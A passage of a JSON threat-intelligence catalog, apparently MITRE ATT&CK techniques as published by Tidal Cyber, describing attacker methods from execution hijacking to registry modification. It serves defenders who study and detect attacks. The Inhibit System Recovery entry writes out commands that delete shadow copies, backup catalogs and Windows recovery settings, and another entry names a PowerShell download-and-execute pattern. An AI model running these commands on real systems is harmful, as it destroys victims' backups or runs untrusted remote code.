"description": "Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.\n\nThere are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
|
||
"type": "uses"
|
||
},
|
||
{
|
||
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
|
||
"type": "uses"
|
||
},
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "1085d0c6-4ff3-45f1-8e0c-d8f334f4ba68",
|
||
"value": "Hijack Execution Flow"
|
||
},
|
||
{
|
||
"description": "Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.\n\nAdversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.<sup>[[Emotet shutdown](https://app.tidalcyber.com/references/02e6c7bf-f81c-53a3-b771-fd77d4cdb5a0)]</sup>\n\nAdversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Containers",
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Office 365",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "e3be3d76-0a36-4060-8003-3b39c557f728",
|
||
"value": "Impair Defenses"
|
||
},
|
||
{
|
||
"description": "Adversaries may impersonate a trusted person or organization in order to persuade and trick a target into performing some action on their behalf. For example, adversaries may communicate with victims (via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06), [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533), or [Internal Spearphishing](https://app.tidalcyber.com/technique/4f4ea659-7653-4bfd-a525-b2af32c5899b)) while impersonating a known sender such as an executive, colleague, or third-party vendor. Established trust can then be leveraged to accomplish an adversary’s ultimate goals, possibly against multiple victims. \n \nIn many cases of business email compromise or email fraud campaigns, adversaries use impersonation to defraud victims -- deceiving them into sending money or divulging information that ultimately enables [Financial Theft](https://app.tidalcyber.com/technique/b9c9fd13-c10c-5e78-aeeb-ac18dc0605f9).\n\nAdversaries will often also use social engineering techniques such as manipulative and persuasive language in email subject lines and body text such as `payment`, `request`, or `urgent` to push the victim to act quickly before malicious activity is detected. These campaigns are often specifically targeted against people who, due to job roles and/or accesses, can carry out the adversary’s goal. \n \nImpersonation is typically preceded by reconnaissance techniques such as [Gather Victim Identity Information](https://app.tidalcyber.com/technique/aea36489-047e-4c4a-ab26-c51fd3556182) and [Gather Victim Org Information](https://app.tidalcyber.com/technique/e55d2e4b-07d8-4c22-b543-c187be320578) as well as acquiring infrastructure such as email domains (i.e. [Domains](https://app.tidalcyber.com/technique/b9f5f6b7-ecff-48c8-a23e-c58fd9e41a0d)) to substantiate their false identity.<sup>[[CrowdStrike-BEC](https://app.tidalcyber.com/references/7e674a8d-e79f-5cb0-8ad2-a7678e647c6f)]</sup>\n \nThere is the potential for multiple victims in campaigns involving impersonation. For example, an adversary may [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3) targeting one organization which can then be used to support impersonation against other entities.<sup>[[VEC](https://app.tidalcyber.com/references/4fd7c9f7-4731-524a-b332-9cb7f2c025ae)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Google Workspace",
|
||
"Linux",
|
||
"macOS",
|
||
"Office 365",
|
||
"SaaS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "20417e43-6ffa-5d36-a2ef-e27cd5a4b8f1",
|
||
"value": "Impersonation"
|
||
},
|
||
{
|
||
"description": "Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://app.tidalcyber.com/technique/8ecf5275-c6d1-4fe3-a24a-63fa1f3144fe), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.<sup>[[Rhino Labs Cloud Image Backdoor Technique Sept 2019](https://app.tidalcyber.com/references/8fb46ed8-0c21-4b57-b2a6-89cb28f0abaf)]</sup>\n\nA tool has been developed to facilitate planting backdoors in cloud container images.<sup>[[Rhino Labs Cloud Backdoor September 2019](https://app.tidalcyber.com/references/ac31b781-dbe4-49c2-b7af-dfb23d435ce8)]</sup> If an adversary has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a [Web Shell](https://app.tidalcyber.com/technique/05a5318f-476d-44c1-8a85-9466295d31dd).<sup>[[Rhino Labs Cloud Image Backdoor Technique Sept 2019](https://app.tidalcyber.com/references/8fb46ed8-0c21-4b57-b2a6-89cb28f0abaf)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Containers",
|
||
"IaaS"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "b4f2b54c-d304-4e05-a813-69bc7e6fd1f3",
|
||
"value": "Implant Internal Image"
|
||
},
|
||
{
|
||
"description": "Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.\n\nRemoval of these indicators may interfere with event collection, reporting, or other processes used to detect intrusion activity. This may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Containers",
|
||
"Google Workspace",
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Office 365",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "fa1507f1-c763-4af1-8bd9-a2fb8f7904be",
|
||
"value": "Indicator Removal"
|
||
},
|
||
{
|
||
"description": "Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8). For example, [Forfiles](https://app.tidalcyber.com/software/c6dc67a6-587d-4700-a7de-bee043a0031a), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c), Run window, or via scripts. <sup>[[VectorSec ForFiles Aug 2017](https://app.tidalcyber.com/references/8088d15d-9512-4d12-a99a-c76ad9dc3390)]</sup> <sup>[[Evi1cg Forfiles Nov 2017](https://app.tidalcyber.com/references/b292b85e-68eb-43c3-9b5b-222810e2f26a)]</sup>\n\nAdversaries may abuse these features for [Defense Evasion](https://app.tidalcyber.com/tactics/8e29c6c9-0c10-4bb0-827d-ff0ab8922726), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) or file extensions more commonly associated with malicious payloads.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "91e79eb9-7f99-4890-8bef-9543d307206d",
|
||
"value": "Indirect Command Execution"
|
||
},
|
||
{
|
||
"description": "Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://app.tidalcyber.com/software/062deac9-8f05-44e2-b347-96b59ba166ca). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://app.tidalcyber.com/technique/3dea57fc-3131-408b-a1fd-ff2eea1d858f)). \n\nOn Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://app.tidalcyber.com/software/2fe21578-ee31-4ee8-b6ab-b5f76f97d043), and [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) commands such as <code>IEX(New-Object Net.WebClient).downloadString()</code> and <code>Invoke-WebRequest</code>. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.<sup>[[t1105_lolbas](https://app.tidalcyber.com/references/80e649f5-6c74-4d66-a452-4f4cd51501da)]</sup>\n\nAdversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows `search-ms` protocol handler, to deliver malicious files to victims through remote file searches invoked by [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872) (typically after interacting with [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) lures).<sup>[[T1105: Trellix_search-ms](https://app.tidalcyber.com/references/7079d170-9ead-5be4-bbc8-13c3f082b3dd)]</sup>\n\nFiles can also be transferred using various [Web Service](https://app.tidalcyber.com/technique/a729feee-8e21-444e-8eea-2ec595b09931)s as well as native or otherwise present tools on the victim system.<sup>[[PTSecurity Cobalt Dec 2016](https://app.tidalcyber.com/references/2de4d38f-c99d-4149-89e6-0349a4902aa2)]</sup> In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.<sup>[[Dropbox Malware Sync](https://app.tidalcyber.com/references/06ca63fa-8c6c-501c-96d3-5e7e45ca1e04)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "4499ce34-9871-4879-883c-19ddb940f242",
|
||
"value": "Ingress Tool Transfer"
|
||
},
|
||
{
|
||
"description": "Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.<sup>[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)]</sup><sup>[[FireEye WannaCry 2017](https://app.tidalcyber.com/references/34b15fe1-c550-4150-87bc-ac9662547247)]</sup> This may deny access to available backups and recovery options.\n\nOperating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://app.tidalcyber.com/technique/e5016c2b-85fe-4e6b-917d-0dd5b441cc34) and [Data Encrypted for Impact](https://app.tidalcyber.com/technique/f0c36d24-263c-4811-8784-f716c77ec6b3).<sup>[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)]</sup><sup>[[FireEye WannaCry 2017](https://app.tidalcyber.com/references/34b15fe1-c550-4150-87bc-ac9662547247)]</sup> Furthermore, adversaries may disable recovery notifications, then corrupt backups.<sup>[[disable_notif_synology_ransom](https://app.tidalcyber.com/references/d53e8f89-df78-565b-a316-cf2644c5ed36)]</sup>\n\nA number of native Windows utilities have been used by adversaries to disable or delete system recovery features:\n\n* <code>vssadmin.exe</code> can be used to delete all volume shadow copies on a system - <code>vssadmin.exe delete shadows /all /quiet</code>\n* [Windows Management Instrumentation](https://app.tidalcyber.com/technique/c37795d9-8970-461f-9491-3086d6b4b69a) can be used to delete volume shadow copies - <code>wmic shadowcopy delete</code>\n* <code>wbadmin.exe</code> can be used to delete the Windows Backup Catalog - <code>wbadmin.exe delete catalog -quiet</code>\n* <code>bcdedit.exe</code> can be used to disable automatic Windows recovery features by modifying boot configuration data - <code>bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no</code>\n* <code>REAgentC.exe</code> can be used to disable Windows Recovery Environment (WinRE) repair/recovery options of an infected system\n* <code>diskshadow.exe</code> can be used to delete all volume shadow copies on a system - <code>diskshadow delete shadows all</code> <sup>[[Diskshadow](https://app.tidalcyber.com/references/9e8b57a5-7e31-5add-ac3e-8b9c0f7f27aa)]</sup> <sup>[[Crytox Ransomware](https://app.tidalcyber.com/references/7c22d9d0-a2d8-5936-a6b1-5c696a2a19c6)]</sup>\n\nOn network devices, adversaries may leverage [Disk Wipe](https://app.tidalcyber.com/technique/ea2b3980-05fd-41a3-8ab9-3106e833c821) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://app.tidalcyber.com/technique/24787dca-6afd-4ab3-ab6c-32e9486ec418) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.\n\nAdversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.<sup>[[ZDNet Ransomware Backups 2020](https://app.tidalcyber.com/references/301da9c8-60de-58f0-989f-6b504e3457a3)]</sup> In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.<sup>[[Dark Reading Code Spaces Cyber Attack](https://app.tidalcyber.com/references/e5a3028a-f4cc-537c-9ddd-769792ab33be)]</sup><sup>[[Rhino Security Labs AWS S3 Ransomware](https://app.tidalcyber.com/references/785c6b11-c5f0-5cb4-931b-cf75fcc368a1)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Containers",
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "d207c03b-fbe7-420e-a053-339f4650c043",
|
||
"value": "Inhibit System Recovery"
|
||
},
|
||
{
|
||
"description": "Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. [Credential API Hooking](https://app.tidalcyber.com/technique/28fd13d1-b555-47fa-9d47-caf6b1367ace)) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. [Web Portal Capture](https://app.tidalcyber.com/technique/34674b83-86a7-4ad9-8b05-49b505aa5ef0)).",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
|
||
"type": "uses"
|
||
},
|
||
{
|
||
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "5ee96331-a7b7-4c32-a8f1-3fb164078f5f",
|
||
"value": "Input Capture"
|
||
},
|
||
{
|
||
"description": "After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://app.tidalcyber.com/technique/20417e43-6ffa-5d36-a2ef-e27cd5a4b8f1).<sup>[[Trend Micro - Int SP](https://app.tidalcyber.com/references/1c21c911-11db-560c-b623-5937dc478b74)]</sup>\n\nFor example, adversaries may leverage [Spearphishing Attachment](https://app.tidalcyber.com/technique/ba553ad4-5699-4458-ae4e-76e1faa43291) or [Spearphishing Link](https://app.tidalcyber.com/technique/d08a9977-9fc2-46bb-84f9-dbb5187c426d) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://app.tidalcyber.com/technique/5ee96331-a7b7-4c32-a8f1-3fb164078f5f) on sites that mimic login interfaces.\n\nAdversaries may also leverage internal chat apps, such as Microsoft Teams, to spread malicious content or engage users in attempts to capture sensitive information and/or credentials.<sup>[[Int SP - chat apps](https://app.tidalcyber.com/references/8d0db0f2-9b29-5216-8c9c-de8bf0c541de)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Google Workspace",
|
||
"Linux",
|
||
"macOS",
|
||
"Office 365",
|
||
"SaaS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "4f4ea659-7653-4bfd-a525-b2af32c5899b",
|
||
"value": "Internal Spearphishing"
|
||
},
|
||
{
|
||
"description": "Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. \n\nAdversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://app.tidalcyber.com/technique/82497cfd-725e-42f8-aaa7-4e20878a6a13) or [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66). Linux environments support several different IPC mechanisms, two of which being sockets and pipes.<sup>[[Linux IPC](https://app.tidalcyber.com/references/05293061-ce09-49b5-916a-bb7353acfdfa)]</sup> Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c)s, may also leverage underlying IPC mechanisms. Adversaries may also use [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) such as [Distributed Component Object Model](https://app.tidalcyber.com/technique/ebc5fabb-5634-49f2-8979-94ea98da114a) to facilitate remote IPC execution.<sup>[[Fireeye Hunting COM June 2019](https://app.tidalcyber.com/references/84311e46-cea1-486a-a737-c4a4946ab837)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "afa4e2b5-cdd8-4d54-bcdb-acee8b5649e4",
|
||
"value": "Inter-Process Communication"
|
||
},
|
||
{
|
||
"description": "Adversaries may transfer tools or other files between systems in a compromised environment. Once brought into the victim environment (i.e., [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242)) files may then be copied from one system to another to stage adversary tools or other files over the course of an operation.\n\nAdversaries may copy files between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over [SMB/Windows Admin Shares](https://app.tidalcyber.com/technique/bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd) to connected network shares or with authenticated connections via [Remote Desktop Protocol](https://app.tidalcyber.com/technique/f5fb86b6-abf0-4d44-b4a0-56f0636c24d2).<sup>[[Unit42 LockerGoga 2019](https://app.tidalcyber.com/references/8f058923-f2f7-4c0e-b90a-c7a0d5e62186)]</sup>\n\nFiles can also be transferred using native or otherwise present tools on the victim system, such as scp, rsync, curl, sftp, and [ftp](https://app.tidalcyber.com/software/062deac9-8f05-44e2-b347-96b59ba166ca). In some cases, adversaries may be able to leverage [Web Service](https://app.tidalcyber.com/technique/a729feee-8e21-444e-8eea-2ec595b09931)s such as Dropbox or OneDrive to copy files from one machine to another via shared, automatically synced folders.<sup>[[Dropbox Malware Sync](https://app.tidalcyber.com/references/06ca63fa-8c6c-501c-96d3-5e7e45ca1e04)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "3dea57fc-3131-408b-a1fd-ff2eea1d858f",
|
||
"value": "Lateral Tool Transfer"
|
||
},
|
||
{
|
||
"description": "Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://app.tidalcyber.com/technique/6736995e-b9ea-401b-81fa-6caeb7a17ce3)), security or vulnerable software ([Software Discovery](https://app.tidalcyber.com/technique/e9bff6ff-3142-4910-8f67-19b868912602)), or hosts within a compromised network ([Remote System Discovery](https://app.tidalcyber.com/technique/00a9a4d4-928d-4d95-be31-dfac6103991f)).\n\nHost binaries may be leveraged to collect system logs. Examples include using `wevtutil.exe` or [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) on Windows to access and/or export security event information.<sup>[[WithSecure Lazarus-NoPineapple Threat Intel Report 2023](https://app.tidalcyber.com/references/195922fa-a843-5cd3-a153-32f0b960dcb9)]</sup><sup>[[Cadet Blizzard emerges as novel threat actor](https://app.tidalcyber.com/references/7180c6a7-e6ea-54bf-bcd7-c5238bbc5f5b)]</sup> In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s `CollectGuestLogs.exe` to collect security logs from cloud hosted infrastructure.<sup>[[SIM Swapping and Abuse of the Microsoft Azure Serial Console](https://app.tidalcyber.com/references/c596a0e0-6e9c-52e4-b1bb-9c0542f960f2)]</sup>\n\nAdversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.",
|
||
"meta": {
|
||
"platforms": [
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "309c7c8b-c366-5762-8611-136971ac4eb4",
|
||
"value": "Log Enumeration"
|
||
},
|
||
{
|
||
"description": "Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.\n\nRenaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd).<sup>[[LOLBAS Main Site](https://app.tidalcyber.com/references/615f6fa5-3059-49fc-9fa4-5ca0aeff4331)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Containers",
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "a0adacc1-8d2a-4e0b-92c1-3766264df4fd",
|
||
"value": "Masquerading"
|
||
},
|
||
{
|
||
"description": "Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406).\n\nAdversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Azure AD",
|
||
"Google Workspace",
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Office 365",
|
||
"SaaS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
|
||
"type": "uses"
|
||
},
|
||
{
|
||
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
|
||
"type": "uses"
|
||
},
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "f516ecd7-a6a6-4018-8e58-c007be05bdce",
|
||
"value": "Modify Authentication Process"
|
||
},
|
||
{
|
||
"description": "An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.\n\nPermissions gained from the modification of infrastructure components may bypass restrictions that prevent access to existing infrastructure. Modifying infrastructure components may also allow an adversary to evade detection and remove evidence of their presence.<sup>[[Mandiant M-Trends 2020](https://app.tidalcyber.com/references/83bc9b28-f8b3-4522-b9f1-f43bce3ae917)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"IaaS"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "46c78b63-d079-441e-abdd-c16b39d4bab3",
|
||
"value": "Modify Cloud Compute Infrastructure"
|
||
},
|
||
{
|
||
"description": "Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.\n\nAccess to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://app.tidalcyber.com/software/d796615c-fa3d-4afd-817a-1a3db8c73532) may be used for local or remote Registry modification. <sup>[[Microsoft Reg](https://app.tidalcyber.com/references/1e1b21bd-18b3-4c77-8eb8-911b028ab603)]</sup> Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.\n\nRegistry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://app.tidalcyber.com/software/d796615c-fa3d-4afd-817a-1a3db8c73532) or other utilities using the Win32 API. <sup>[[Microsoft Reghide NOV 2006](https://app.tidalcyber.com/references/42503ec7-f5da-4116-a3b3-a1b18a66eed3)]</sup> Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence. <sup>[[TrendMicro POWELIKS AUG 2014](https://app.tidalcyber.com/references/4a42df15-4d09-4f4f-8333-2b41356fdb80)]</sup> <sup>[[SpectorOps Hiding Reg Jul 2017](https://app.tidalcyber.com/references/877a5ae4-ec5f-4f53-b69d-ba74ff9e1619)]</sup>\n\nThe Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. <sup>[[Microsoft Remote](https://app.tidalcyber.com/references/331d59e3-ce7f-483c-b77d-001c8a9ae1df)]</sup> Often [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://app.tidalcyber.com/technique/bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd) for RPC communication.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "0dfeab84-3c42-4b56-9021-70fe5be4092b",
|
||
"value": "Modify Registry"
|
||
},
|
||
{
|
||
